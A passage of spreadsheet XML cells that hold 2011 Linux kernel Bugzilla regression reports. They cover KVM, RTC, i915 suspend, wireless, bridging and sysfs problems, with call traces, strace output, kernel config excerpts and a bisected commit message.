    <t>Created attachment 60022 [details] config-3.0.0-rc1 Host is 3.0.0-rc1, guest is 3.0.0-rc1. After shutting down the guest, KVM on the host uses 100% CPU. gdb shows for KVM: 6 Thread 0x7f00d1875700 (LWP 32105) 0x0000003e278ce2f7 in ioctl () at ../sysdeps/unix/syscall-template.S:82 5 Thread 0x7f00d1074700 (LWP 32106) 0x0000003e278ce2f7 in ioctl () at ../sysdeps/unix/syscall-template.S:82 4 Thread 0x7f00d0873700 (LWP 32107) 0x0000003e278ce2f7 in ioctl () at ../sysdeps/unix/syscall-template.S:82 3 Thread 0x7f00d0072700 (LWP 32108) 0x0000003e278ce2f7 in ioctl () at ../sysdeps/unix/syscall-template.S:82 2 Thread 0x7f00cf871700 (LWP 32109) 0x0000003e278ce2f7 in ioctl () at ../sysdeps/unix/syscall-template.S:82 * 1 Thread 0x7f00d1e95760 (LWP 32100) 0x0000003e278ceda3 in select () at ../sysdeps/unix/syscall-template.S:82 This seems to be a problem with the 3.0.0-rc1 guest, because if I boot 2.6.39 in the guest (still keeping same 3.0.0-rc1 running on the host), then shutdown completes normally, no 100% CPU usage loop. .config for KVM guest attached. KVM command-line (created by libvirt): /usr/bin/kvm -S -M pc-0.14 -cpu phenom,+wdt,+skinit,+osvw,+3dnowprefetch,+misalignsse,+sse4a,+abm,+cr8legacy,+extapic,+cmp_legacy,+lahf_lm,+rdtscp,+pdpe1gb,+popcnt,+cx16,+ht,+vme -enable-nesting -enable-kvm -m 3072 -smp 5,sockets=5,cores=1,threads=1 -name debian-enc -uuid 55782a0a-937c-fa7b-8db5-86876d151a08 -nodefconfig -nodefaults -chardev socket,id=charmonitor,path=/var/lib/libvirt/qemu/debian-enc.monitor,server,nowait -mon chardev=charmonitor,id=monitor,mode=readline -rtc base=utc -boot order=c,menu=off -drive file=/var/lib/libvirt/images/debian-enc.img,if=none,id=drive-virtio-disk0,boot=on,format=raw -device virtio-blk-pci,bus=pci.0,addr=0x5,drive=drive-virtio-disk0,id=virtio-disk0 -drive if=none,media=cdrom,id=drive-ide0-1-0,readonly=on,format=raw -device ide-drive,bus=ide.1,unit=0,drive=drive-ide0-1-0,id=ide0-1-0 -netdev tap,fd=18,id=hostnet0,vhost=on,vhostfd=19 -device virtio-net-pci,netdev=hostnet0,id=net0,mac=52:54:00:52:de:54,bus=pci.0,addr=0x3 -chardev pty,id=charserial0 -device isa-serial,chardev=charserial0,id=serial0 -usb -device usb-tablet,id=input0 -vnc 127.0.0.1:0 -vga cirrus -device virtio-balloon-pci,id=balloon0,bus=pci.0,addr=0x6 Bisecting...</t>
  </si>
  <si>
    <t>hwclock: select() to /dev/rtc to wait for clock tick timed out</t>
  </si>
  <si>
    <t>3.0.0-rc1 / 2.6.38</t>
  </si>
  <si>
    <t>2011-05-30 13:26 UTC</t>
  </si>
  <si>
    <t>2012-09-05 06:43 UTC</t>
  </si>
  <si>
    <t>Hello, after upgrading from 2.6.37.5 to 2.6.38.7, the hwclock command times out on a kvm guest system: [root@hwclock ~]# hwclock select() to /dev/rtc to wait for clock tick timed out Relevant strace output: ioctl(4, RTC_UIE_ON, 0) = 0 select(5, [4], NULL, NULL, {5, 0}) = 0 (Timeout) The kvm host system is Centos 5.6. Another virtual machine running on a Fedora 14 kvm host works fine. I've bisected it down to this commit: # git bisect bad 6610e0893b8bc6f59b14fed7f089c5997f035f88 is the first bad commit commit 6610e0893b8bc6f59b14fed7f089c5997f035f88 Author: John Stultz &lt;john.stultz@linaro.org&gt; Date: Thu Sep 23 15:07:34 2010 -0700 RTC: Rework RTC code to use timerqueue for events This patch reworks a large portion of the generic RTC code to in-effect virtualize the rtc interrupt code. The current RTC interface is very much a raw hardware interface. Via the proc, /dev/, or sysfs interfaces, applciations can set the hardware to trigger interrupts in one of three modes: AIE: Alarm interrupt UIE: Update interrupt (ie: once per second) PIE: Periodic interrupt (sub-second irqs) The problem with this interface is that it limits the RTC hardware so it can only be used by one application at a time. The purpose of this patch is to extend the RTC code so that we can multiplex multiple applications event needs onto a single RTC device. This is done by utilizing the timerqueue infrastructure to manage a list of events, which cause the RTC hardware to be programmed to fire an interrupt for the next event in the list. In order to preserve the functionality of the exsting proc,/dev/ and sysfs interfaces, we emulate the different interrupt modes as follows: AIE: We create a rtc_timer dedicated to AIE mode interrupts. There is only one per device, so we don't change existing interface semantics. UIE: Again, a dedicated rtc_timer, set for periodic mode, is used to emulate UIE interrupts. Again, only one per device. PIE: Since PIE mode interrupts fire faster then the RTC's clock read granularity, we emulate PIE mode interrupts using a hrtimer. Again, one per device. With this patch, the rtctest.c application in Documentation/rtc.txt passes fine on x86 hardware. However, there may very well still be bugs, so greatly I'd appreciate any feedback or testing! Signed-off-by: John Stultz &lt;john.stultz@linaro.org&gt; LKML Reference: &lt;1290136329-18291-4-git-send-email-john.stultz@linaro.org&gt; Acked-by: Alessandro Zummo &lt;a.zummo@towertech.it&gt; Reviewed-by: Thomas Gleixner &lt;tglx@linutronix.de&gt; CC: Alessandro Zummo &lt;a.zummo@towertech.it&gt; CC: Thomas Gleixner &lt;tglx@linutronix.de&gt; CC: Richard Cochran &lt;richardcochran@gmail.com&gt; ---------------------------------- Reverting the commit cures the issue. I've also tested kernel 3.0.0-rc1, the problem is still there. As one virtual machine is running fine and another one isn't, this might be a bug in the "old" Centos 5.6 kvm host system? Relevant kernel config: [linux-2.6]# grep RTC .config CONFIG_HPET_EMULATE_RTC=y CONFIG_RTC_LIB=y CONFIG_RTC_CLASS=y CONFIG_RTC_HCTOSYS=y CONFIG_RTC_HCTOSYS_DEVICE="rtc0" # CONFIG_RTC_DEBUG is not set # RTC interfaces CONFIG_RTC_INTF_SYSFS=y CONFIG_RTC_INTF_PROC=y CONFIG_RTC_INTF_DEV=y # Platform RTC drivers CONFIG_RTC_DRV_CMOS=m [root@hwclock ~]# grep -i rtc /var/log/dmesg drivers/rtc/hctosys.c: unable to open rtc device (rtc0) rtc_cmos 00:01: rtc core: registered rtc_cmos as rtc0 rtc0: alarms up to one day, 114 bytes nvram Best regards, Thomas</t>
  </si>
  <si>
    <t>SandyBridge can't do s2disk with linux 3.0-rc1</t>
  </si>
  <si>
    <t>3.0-rc5</t>
  </si>
  <si>
    <t>2011-05-30 23:10 UTC</t>
  </si>
  <si>
    <t>2011-06-29 19:22 UTC</t>
  </si>
  <si>
    <t>Laptop can't suspend to disk with 3.0-rc1. Here is trace from dmesg. [ 1279.227422] ------------[ cut here ]------------ [ 1279.227425] WARNING: at drivers/gpu/drm/i915/i915_drv.c:340 gen6_gt_force_wake_put+0x1f/0x45 [i915]() [ 1279.227426] Hardware name: 4170CTO [ 1279.227427] Modules linked in: aesni_intel cryptd aes_x86_64 aes_generic parport_pc ppdev lp parport acpi_cpufreq cpufreq_stats cpufreq_userspace mperf rfcomm bnep cpufreq_conservative cpufreq_powersave uinput fuse loop snd_hda_codec_hdmi snd_hda_codec_conexant uvcvideo btusb videodev joydev bluetooth arc4 media v4l2_compat_ioctl32 i915 snd_hda_intel snd_hda_codec drm_kms_helper drm snd_hwdep snd_pcm i2c_algo_bit tpm_tis snd_seq i2c_i801 thinkpad_acpi snd_timer i2c_core snd_seq_device tpm iwlagn mac80211 snd mei(C) soundcore nvram tpm_bios battery ac video wmi evdev snd_page_alloc psmouse serio_raw cfg80211 power_supply rfkill button processor pcspkr ext4 mbcache jbd2 crc16 dm_mod sd_mod crc_t10dif xhci_hcd thermal thermal_sys ahci libahci sdhci_pci sdhci ehci_hcd libata mmc_core e1000e usbcore scsi_mod [last unloaded: scsi_wait_scan] [ 1279.227448] Pid: 4893, comm: kworker/u:25 Tainted: G WC 3.0.0-rc1 #3 [ 1279.227448] Call Trace: [ 1279.227450] [&lt;ffffffff810407ac&gt;] ? warn_slowpath_common+0x78/0x8c [ 1279.227454] [&lt;ffffffffa03374c2&gt;] ? gen6_gt_force_wake_put+0x1f/0x45 [i915] [ 1279.227458] [&lt;ffffffffa034112c&gt;] ? i915_read8+0x38/0x5b [i915] [ 1279.227462] [&lt;ffffffffa0343107&gt;] ? i915_restore_display+0xfe3/0x1029 [i915] [ 1279.227466] [&lt;ffffffffa0343371&gt;] ? i915_restore_state+0x4c/0x1e3 [i915] [ 1279.227469] [&lt;ffffffffa03370db&gt;] ? i915_drm_thaw+0x47/0xcd [i915] [ 1279.227472] [&lt;ffffffffa03372fc&gt;] ? i915_resume+0x3a/0x4e [i915] [ 1279.227474] [&lt;ffffffff8123347e&gt;] ? pm_op+0x118/0x140 [ 1279.227475] [&lt;ffffffff8105e72f&gt;] ? async_schedule+0xc/0xc [ 1279.227477] [&lt;ffffffff812336ff&gt;] ? device_resume+0x89/0xc1 [ 1279.227479] [&lt;ffffffff8123374b&gt;] ? async_resume+0x14/0x38 [ 1279.227480] [&lt;ffffffff8105e7c5&gt;] ? async_run_entry_fn+0x96/0x141 [ 1279.227482] [&lt;ffffffff810551c1&gt;] ? process_one_work+0x163/0x284 [ 1279.227483] [&lt;ffffffff810560f4&gt;] ? worker_thread+0xc2/0x145 [ 1279.227485] [&lt;ffffffff81056032&gt;] ? manage_workers.isra.24+0x15b/0x15b [ 1279.227487] [&lt;ffffffff81058fc9&gt;] ? kthread+0x76/0x7e [ 1279.227488] [&lt;ffffffff813218a4&gt;] ? kernel_thread_helper+0x4/0x10 [ 1279.227490] [&lt;ffffffff81058f53&gt;] ? kthread_worker_fn+0x139/0x139 [ 1279.227492] [&lt;ffffffff813218a0&gt;] ? gs_change+0x13/0x13 [ 1279.227492] ---[ end trace a7c30e4bceb9b906 ]---</t>
  </si>
  <si>
    <t>Resume from hibernate unreliable on samsung sf510</t>
  </si>
  <si>
    <t>2011-06-01 20:36 UTC</t>
  </si>
  <si>
    <t>2012-01-18 05:18 UTC</t>
  </si>
  <si>
    <t>Resume from hibernate works only 40% of times. At other times the laptop freezes completely. In some cases it can be rebootet with Alt-SysReq b. I have tried to collect some screenshots and dmesg outputs but I don't manage to make much sense of the information because I can't find any pattern. I am currently running stock ubuntu natty amd64. I will attach everything I have so far and am willing to try vanilla kernels, apply patches or whatever is required to get to the root of this. I'd just need some directions from an expert.</t>
  </si>
  <si>
    <t>iwl4965 slow connection- package loss</t>
  </si>
  <si>
    <t>2011-06-01 23:48 UTC</t>
  </si>
  <si>
    <t>Marko</t>
  </si>
  <si>
    <t>2011-06-16 14:50 UTC</t>
  </si>
  <si>
    <t>Created attachment 60502 [details] iwl logs for 2.6.39 The wireless connection, using the iwl4965 driver from kernel 2.6.29 is slow compared with the one from kernel 2.6.37-r2. lspci |grep -i wireless 14:00.0 Network controller: Intel Corporation PRO/Wireless 4965 AG or AGN [Kedron] Network Connection (rev 61) wlan0 IEEE 802.11abgn ESSID:"sid123" Mode:Managed Frequency:2.462 GHz Access Point: xxx Bit Rate=1 Mb/s Tx-Power=14 dBm Retry long limit:7 RTS thr:off Fragment thr:off Encryption key:off Power Management:off Link Quality=59/70 Signal level=-51 dBm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:8 Invalid misc:25 Missed beacon:0 Kernel 2.6.37: modinfo iwlagn filename: /lib/modules/2.6.37-gentoo-r2/kernel/drivers/net/wireless/iwlwifi/iwlagn.ko alias: iwl4965 license: GPL author: Copyright(c) 2003-2010 Intel Corporation &lt;ilw@linux.intel.com&gt; version: in-tree:d description: Intel(R) Wireless WiFi Link AGN driver for Linux firmware: iwlwifi-4965-2.ucode firmware: iwlwifi-5150-2.ucode firmware: iwlwifi-5000-2.ucode firmware: iwlwifi-130-5.ucode firmware: iwlwifi-6000g2b-5.ucode firmware: iwlwifi-6000g2a-5.ucode firmware: iwlwifi-6050-5.ucode firmware: iwlwifi-6000-4.ucode firmware: iwlwifi-100-5.ucode firmware: iwlwifi-1000-3.ucode srcversion: 7D88AD0FB2555D0E1BA4B48 depends: iwlcore,mac80211,cfg80211 vermagic: 2.6.37-gentoo-r2 SMP mod_unload ping www.google.com ... --- www.l.google.com ping statistics --- 5 packets transmitted, 5 received, 0% packet loss, time 4006ms rtt min/avg/max/mdev = 49.373/50.167/50.858/0.538 ms kernel module loaded with modprobe iwlagn debug=0x47fffff Logs are captured in iwl-good-2.6.37.log System logger syslog-ng. Filter used filter f_iwl { facility(kern) and message("iwl4965.*"); }; kernel 2.6.39 ping www.google.com ... --- www.google.com ping statistics --- 9 packets transmitted, 8 received, 11% packet loss, time 8008ms rtt min/avg/max/mdev = 48.856/52.062/57.012/2.885 ms Logs are captured in iwl-bad-2.6.39.log System logger syslog-ng. Filter used filter f_iwl { facility(kern) and message("iwlagn*"); };</t>
  </si>
  <si>
    <t>3.0-rc1</t>
  </si>
  <si>
    <t>Bridge fails to work normally without net.ipv4.ip_forward=1</t>
  </si>
  <si>
    <t>2.6.38.7</t>
  </si>
  <si>
    <t>2011-06-03 19:21 UTC</t>
  </si>
  <si>
    <t>Igor Novgorodov</t>
  </si>
  <si>
    <t>2012-05-12 14:04 UTC</t>
  </si>
  <si>
    <t>Yes, this seems strange, but it's seems to be true. My network scheme is quite simple: (host1) &lt;--- 10gbe ---&gt; (bridge host) &lt;--- 10gbe ---&gt; (host2) host1 &amp; host2 are actually VMWare ESXi hypervisors, but that's irrelevant in this case i think. Network adapters are Intel's 82599 10 gig cards on all hosts. At the bridge, on each interface i've created a vlan, and then bridged them: # vconfig add eth0 102 # vconfig add eth1 102 # brctl addbr br0 # brctl addif br0 eth0.102 # brctl addif br0 eth1.102 # ip link set br0 mtu 9000 up ...etc... At this point, the bridge seems to be working, i can ping between host1 &amp; host2, even with jumbo frames without fragmentation. BUT when i am trying to use iperf &amp; friends to measure raw tcp speed between hosts 1/2, i'm getting something weird like 7-10 MEGABITS per second, or even an iperf hang until ctrl+c. If i attach an ip address to the bridge, and measure between hosts and the bridge, it works flawlessly, rendering 9.8Gbit/s in both directions. While trying to find a solution, when i ran out of options, i've set net.ipv4.ip_forward to 1, and, SURPRISE, the bridge started to work like a charm, at almost 10gig speed. What makes it stranger, is that in my kernel, i've turned off all routing code, iptables and other stuff, as this host serves primarily as iSCSI target. I have little knowledge in kernel's deep internals, but i always thought that bridging &amp; routing are on different levels of operation and couldn't affect each other (ebtables is an exception, but i don't have it :) ). Maybe i'm interpreting the results wrong, but i've ruled out everything else. Currently, i can't use this setup as a test ground, i'll try to replicate the scheme in a virtual environment to see if other kernels are affected as well. Glad to hear any ideas on this.</t>
  </si>
  <si>
    <t>Intel GM45: Low resolution on external screen.</t>
  </si>
  <si>
    <t>2.6.39, 2.6.39.1</t>
  </si>
  <si>
    <t>2011-06-04 17:37 UTC</t>
  </si>
  <si>
    <t>Alex Ferrando</t>
  </si>
  <si>
    <t>2011-07-04 08:47 UTC</t>
  </si>
  <si>
    <t>Created attachment 60792 [details] dmesg output (the problem mentioned on the report is at the end of the file) What I'm going to describe did not happened on 2.6.38.x . I apologize if the bug report is incomplete and being my first time doing this can make that I have forgot to add some log. If that's the case, please, tell me. Something more to be said before the report itself: I'm using Kernel Mode Setting as I did on 2.6.38. Nothing else changes between 2.6.38.8 and 2.6.39 as I currently have both installed. Since the upgrade from kernel 2.6.38.8 to 2.6.39 and 2.6.39.1, whenever I plug my external VGA monitor to the laptop even if I do not set it tot be used, the messages log gets spammed with fragments like this: drm:drm_edid_block_valid] *ERROR* EDID checksum is invalid, remainder is 130 [drm:drm_edid_block_valid] *ERROR* Raw EDID: &lt;3&gt;00 ff ff ff ff ff ff 00 ff ff ff ff ff ff ff ff ................ &lt;3&gt;ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ................ &lt;3&gt;ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ................ &lt;3&gt;ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ................ &lt;3&gt;ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ................ &lt;3&gt;ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ................ &lt;3&gt;ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ................ &lt;3&gt;ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ................ Also, the resolution at which I can set the screen has been redoced from 1280x1024 to 1024x768. I can force it to work at 1280x1024 using xrandr to add a new mode but whenever I do this, the screen gets moved to the left, leaving a black vertical artifact at the right of the VGA screen. The area covered by that black artifact gets ignored as if it would not exist, and since I use the VGA screen at the left of the LVDS screen of the laptop, that black zone is trated as if the screen ended there, making the mouse or any window to appear on the LVDS screen. Aside from the external screen problem, everything else seems to work and no X or kernel crashes have been suffered.</t>
  </si>
  <si>
    <t>after kernel upgrade form 2.6.32 can't connect to wireless anymore</t>
  </si>
  <si>
    <t>2011-06-05 00:38 UTC</t>
  </si>
  <si>
    <t>Marco</t>
  </si>
  <si>
    <t>2012-01-13 16:11 UTC</t>
  </si>
  <si>
    <t>I'm on debian linux, and was running the stable version that ships with kernel 2.6.32 and an usb wireless adapter which uses rt73usb driver (I think). Decided to upgrade to debian unstable (testing) and now I can't connect to wireless unless I set a static IP connection. I'm sure that this is a kernel problem, because after the upgrade I have two kernel images on my system: 2.6.32 (stable) and 2.6.38 (unstable) If on grub boot menu I choose 2.6.32 wireless still works perfectly if I choose 2.6.38 I can't connect: exactly it keeps trying till it times out without obtaining an IP address.</t>
  </si>
  <si>
    <t>2.6.39 kernel panic w/screenshots &amp; kernel cfg link provided</t>
  </si>
  <si>
    <t>2011-06-05 13:11 UTC</t>
  </si>
  <si>
    <t>2011-07-02 12:42 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.39 kernel panic w/screenshots &amp; kernel cfg link provided Submitter : Justin Piszcz &lt;jpiszcz@lucidpixels.com&gt; Date : 2011-05-28 12:01 Message-ID : alpine.DEB.2.02.1105280755050.4345@p34.internal.lan References : http://marc.info/?l=linux-kernel&amp;m=130658411008127&amp;w=2 This entry is being used for tracking a regression from 2.6.38. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Kernel compilation fails at module apm.ko</t>
  </si>
  <si>
    <t>3.0.0-rc1,rc2</t>
  </si>
  <si>
    <t>2011-06-07 15:34 UTC</t>
  </si>
  <si>
    <t>2011-06-14 21:23 UTC</t>
  </si>
  <si>
    <t>Kernel compilation fails at module apm.ko with the following message: ERROR: "pm_idle" [arch/x86/kernel/apm.ko] undefined! ERROR: "default_idle" [arch/x86/kernel/apm.ko] undefined! make[1]: *** [__modpost] Error 1 make: *** [modules] Error 2</t>
  </si>
  <si>
    <t>[2.6.39] CIFS write failures where 2.6.38 works</t>
  </si>
  <si>
    <t>2011-06-08 19:33 UTC</t>
  </si>
  <si>
    <t>2011-07-10 20:22 UTC</t>
  </si>
  <si>
    <t>Subject : [2.6.39] CIFS write failures where 2.6.38 works Submitter : Helge Hafting &lt;helge.hafting@hist.no&gt; Date : 2011-06-01 10:11 Message-ID : 4DE6103E.6010100@hist.no References : http://marc.info/?l=linux-kernel&amp;m=130692387613423&amp;w=2 This entry is being used for tracking a regression from 2.6.38. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>[Regression 2.6.39][nouveau][bisected?] leaving fullscreen XV "crashes" with KDE desktop effects enabled</t>
  </si>
  <si>
    <t>2011-06-08 19:39 UTC</t>
  </si>
  <si>
    <t>2011-06-22 08:28 UTC</t>
  </si>
  <si>
    <t>Subject : [Regression 2.6.39][nouveau][bisected?] leaving fullscreen XV "crashes" with KDE desktop effects enabled Submitter : Jan Seiffert &lt;kaffeemonster@googlemail.com&gt; Date : 2011-05-25 2:32 Message-ID : BANLkTimd6nvXTbn2hM+cKDNKFpxzsQLHog@mail.gmail.com References : http://marc.info/?l=linux-kernel&amp;m=130629073407685&amp;w=2 This entry is being used for tracking a regression from 2.6.38. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>3.0-rc1: DMAR errors from iwlagn</t>
  </si>
  <si>
    <t>2011-06-08 19:44 UTC</t>
  </si>
  <si>
    <t>2011-07-10 09:48 UTC</t>
  </si>
  <si>
    <t>Subject : 3.0-rc1: DMAR errors from iwlagn Submitter : Jeremy Fitzhardinge &lt;jeremy@goop.org&gt; Date : 2011-05-31 21:14 Message-ID : 4DE55A26.6040702@goop.org References : http://marc.info/?l=linux-kernel&amp;m=130687723213857&amp;w=2 This entry is being used for tracking a regression from 2.6.39. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>3.0-rc1 problem with usb, cdrom</t>
  </si>
  <si>
    <t>2011-06-08 19:49 UTC</t>
  </si>
  <si>
    <t>2011-06-26 21:19 UTC</t>
  </si>
  <si>
    <t>Subject : 3.0-rc1 problem with usb, cdrom Submitter : "werner" &lt;w.landgraf@ru.ru&gt; Date : 2011-06-01 16:43 Message-ID : web-538043386@zbackend1.aha.ru References : http://marc.info/?l=linux-kernel&amp;m=130694663410114&amp;w=2 This entry is being used for tracking a regression from 2.6.39. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>linux 3.0.0-rc2 libata-eh.c:4018 ata_scsi_port_error_handler+0x80/0x53d on s2disk</t>
  </si>
  <si>
    <t>3.0.0-rc2</t>
  </si>
  <si>
    <t>2011-06-09 08:22 UTC</t>
  </si>
  <si>
    <t>2011-08-09 08:27 UTC</t>
  </si>
  <si>
    <t>Created attachment 61332 [details] kernel.log Hi, I'm using linux kernel 3.0.0-rc2 from git and seems s2disk functionality is broken, s2ram also doesn't work, I suspect that bith these regressions have same roots. And yes this is a regression because it worked OK in linux 2.6.39</t>
  </si>
  <si>
    <t>Atheros AR9285 Rev:2 locks up my system</t>
  </si>
  <si>
    <t>2.6.38.6, 2.6.38.7, 2.6.39.1</t>
  </si>
  <si>
    <t>2011-06-10 03:54 UTC</t>
  </si>
  <si>
    <t>Lonicerae</t>
  </si>
  <si>
    <t>Hi, i installed Fedora 15 on my Lenovo G475 notebook, which has a Atheros AR9285 wireless adapter. if i turn on the wireless card in my bios, my system hangs after boot everytime. then i disable the wireless, my system works well. i've tried different kernel, eg. 2.6.38.6, 2.6.38.7, 2.6.39.1, all of them have the same problem. i've report the bug to Redhat, but it seems that they cann't solve it. https://bugzilla.redhat.com/show_bug.cgi?id=707276 and i've tried the methods which are described on debian and archlinux bug lists. http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=611946 https://bugs.archlinux.org/task/20735 but the problem still there... Flos</t>
  </si>
  <si>
    <t>[GM965/KMS/UXA] memory corruption on resume from hibernate</t>
  </si>
  <si>
    <t>2.6.37.6</t>
  </si>
  <si>
    <t>2011-06-10 14:20 UTC</t>
  </si>
  <si>
    <t>2012-08-30 15:19 UTC</t>
  </si>
  <si>
    <t>13811 42643</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #13811 +++ I couldn't re-open the original bug (because I didn't report it), so I'm cloning this bug. It may even be better, because _something_ was fixed in that other bug, so this may be another bug w</t>
  </si>
  <si>
    <t>3.0.0-rc1-git3 -- kernel/sched.c:619 invoked rcu_dereference_check() without protection!</t>
  </si>
  <si>
    <t>3.0.0-rc1-git3</t>
  </si>
  <si>
    <t>2011-06-11 16:26 UTC</t>
  </si>
  <si>
    <t>2011-06-26 21:22 UTC</t>
  </si>
  <si>
    <t>Subject : 3.0.0-rc1-git3 -- kernel/sched.c:619 invoked rcu_dereference_check() without protection! Submitter : Miles Lane &lt;miles.lane@gmail.com&gt; Date : 2011-06-04 3:22 Message-ID : BANLkTikHS7TuFhm3cfJ+Y=erWDaAwuE_TA@mail.gmail.com References : http://marc.info/?l=linux-kernel&amp;m=130715775803343&amp;w=2 This entry is being used for tracking a regression from 2.6.39. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>kernel BUG at fs/ecryptfs/read_write.c:47!</t>
  </si>
  <si>
    <t>2.6.39-ARCH #1</t>
  </si>
  <si>
    <t>2011-06-12 10:25 UTC</t>
  </si>
  <si>
    <t>rems14</t>
  </si>
  <si>
    <t>2011-09-06 08:05 UTC</t>
  </si>
  <si>
    <t>Created attachment 61642 [details] Bugtrace Hello, After opening Evolution in gnome, a screen console is display with the bugtrace error. To shutdown the system, the system freeze and Magic keys doesn't work. The problem is appear when I've upgraded to linux-2.6.39, but if I downgrade to linux-2.6.38 the problem is disappeared. I use ecryptfs to encrypt my home directory. Thanks</t>
  </si>
  <si>
    <t>Regression d72bce0e67e8afc6eb959f656013cbb577426f1e</t>
  </si>
  <si>
    <t>3.0-rc2</t>
  </si>
  <si>
    <t>2011-06-12 17:26 UTC</t>
  </si>
  <si>
    <t>Helber Maciel Guerra</t>
  </si>
  <si>
    <t>2011-06-21 12:12 UTC</t>
  </si>
  <si>
    <t>Created attachment 61692 [details] Bisect I got a kernel panic - not syncing: hung_task: blocked tasks</t>
  </si>
  <si>
    <t>sysfs: cannot create duplicate filename '/devices/platform/GHES.9'</t>
  </si>
  <si>
    <t>2.6.38 to 3.0-rc2</t>
  </si>
  <si>
    <t>2011-06-13 12:10 UTC</t>
  </si>
  <si>
    <t>2011-07-31 18:01 UTC</t>
  </si>
  <si>
    <t>Jun 12 22:06:33 ThinkPad-Edge kernel: [ 0.381050] WARNING: at /home/kernel-ppa/COD/linux/fs/sysfs/dir.c:455 sysfs_add_one+0xbb/0xe0() Jun 12 22:06:33 ThinkPad-Edge kernel: [ 0.381054] Hardware name: 2545A12 Jun 12 22:06:33 ThinkPad-Edge kernel: [ 0.381057] sysfs: cannot create duplicate filename '/devices/platform/GHES.9' Jun 12 22:06:33 ThinkPad-Edge kernel: [ 0.381061] Modules linked in: Jun 12 22:06:33 ThinkPad-Edge kernel: [ 0.381066] Pid: 1, comm: swapper Not tainted 3.0.0-0300rc2-generic #201106081532 Jun 12 22:06:33 ThinkPad-Edge kernel: [ 0.381071] Call Trace: Jun 12 22:06:33 ThinkPad-Edge kernel: [ 0.381079] [&lt;ffffffff811d93bb&gt;] ? sysfs_add_one+0xbb/0xe0 Jun 12 22:06:33 ThinkPad-Edge kernel: [ 0.381086] [&lt;ffffffff810611d0&gt;] warn_slowpath_common+0x90/0xc0 Jun 12 22:06:33 ThinkPad-Edge kernel: [ 0.381092] [&lt;ffffffff810612fe&gt;] warn_slowpath_fmt+0x6e/0x70 Jun 12 22:06:33 ThinkPad-Edge kernel: [ 0.381098] [&lt;ffffffff811d8e95&gt;] ? sysfs_pathname+0x45/0x60 Jun 12 22:06:33 ThinkPad-Edge kernel: [ 0.381104] [&lt;ffffffff811d8e95&gt;] ? sysfs_pathname+0x45/0x60 Jun 12 22:06:33 ThinkPad-Edge kernel: [ 0.381109] [&lt;ffffffff811d8e95&gt;] ? sysfs_pathname+0x45/0x60 Jun 12 22:06:33 ThinkPad-Edge kernel: [ 0.381115] [&lt;ffffffff811d93bb&gt;] sysfs_add_one+0xbb/0xe0 Jun 12 22:06:33 ThinkPad-Edge kernel: [ 0.381121] [&lt;ffffffff811d96ba&gt;] create_dir+0x7a/0xd0 Jun 12 22:06:33 ThinkPad-Edge kernel: [ 0.381128] [&lt;ffffffff81b0b470&gt;] ? setup_hest_disable+0x20/0x20 Jun 12 22:06:33 ThinkPad-Edge kernel: [ 0.381133] [&lt;ffffffff811d9768&gt;] sysfs_create_dir+0x58/0x90 Jun 12 22:06:33 ThinkPad-Edge kernel: [ 0.381140] [&lt;ffffffff812e3852&gt;] create_dir+0x22/0x60 Jun 12 22:06:33 ThinkPad-Edge kernel: [ 0.381146] [&lt;ffffffff812e3d91&gt;] kobject_add_internal+0x91/0x110 Jun 12 22:06:33 ThinkPad-Edge kernel: [ 0.381153] [&lt;ffffffff812e3f8d&gt;] kobject_add_varg+0x5d/0x70 Jun 12 22:06:33 ThinkPad-Edge kernel: [ 0.381159] [&lt;ffffffff812e4099&gt;] kobject_add+0x69/0x90 Jun 12 22:06:33 ThinkPad-Edge kernel: [ 0.381166] [&lt;ffffffff813c7f89&gt;] ? dev_set_name+0x69/0x70 Jun 12 22:06:33 ThinkPad-Edge kernel: [ 0.381172] [&lt;ffffffff812e3baa&gt;] ? kobject_get+0x1a/0x30 Jun 12 22:06:33 ThinkPad-Edge kernel: [ 0.381178] [&lt;ffffffff811552ad&gt;] ? kmem_cache_alloc_trace+0x8d/0x110 Jun 12 22:06:33 ThinkPad-Edge kernel: [ 0.381184] [&lt;ffffffff813c9576&gt;] ? setup_parent+0x16/0x30 Jun 12 22:06:33 ThinkPad-Edge kernel: [ 0.381189] [&lt;ffffffff813c9641&gt;] device_add+0xb1/0x370 Jun 12 22:06:33 ThinkPad-Edge kernel: [ 0.381195] [&lt;ffffffff813cddc2&gt;] platform_device_add+0x182/0x1d0 Jun 12 22:06:33 ThinkPad-Edge kernel: [ 0.381201] [&lt;ffffffff81b0b470&gt;] ? setup_hest_disable+0x20/0x20 Jun 12 22:06:33 ThinkPad-Edge kernel: [ 0.381206] [&lt;ffffffff81b0b4e5&gt;] hest_parse_ghes+0x75/0xa0 Jun 12 22:06:33 ThinkPad-Edge kernel: [ 0.381213] [&lt;ffffffff813769c5&gt;] apei_hest_parse+0x65/0xd0 Jun 12 22:06:33 ThinkPad-Edge kernel: [ 0.381218] [&lt;ffffffff81b0b553&gt;] hest_ghes_dev_register+0x43/0x90 Jun 12 22:06:33 ThinkPad-Edge kernel: [ 0.381224] [&lt;ffffffff81b0a96d&gt;] ? find_dock+0x23/0x23 Jun 12 22:06:33 ThinkPad-Edge kernel: [ 0.381229] [&lt;ffffffff81b0b63c&gt;] acpi_hest_init+0x9c/0xd0 Jun 12 22:06:33 ThinkPad-Edge kernel: [ 0.381234] [&lt;ffffffff81b0a976&gt;] acpi_pci_root_init+0x9/0x32 Jun 12 22:06:33 ThinkPad-Edge kernel: [ 0.381241] [&lt;ffffffff81002168&gt;] do_one_initcall+0xe8/0x130 Jun 12 22:06:33 ThinkPad-Edge kernel: [ 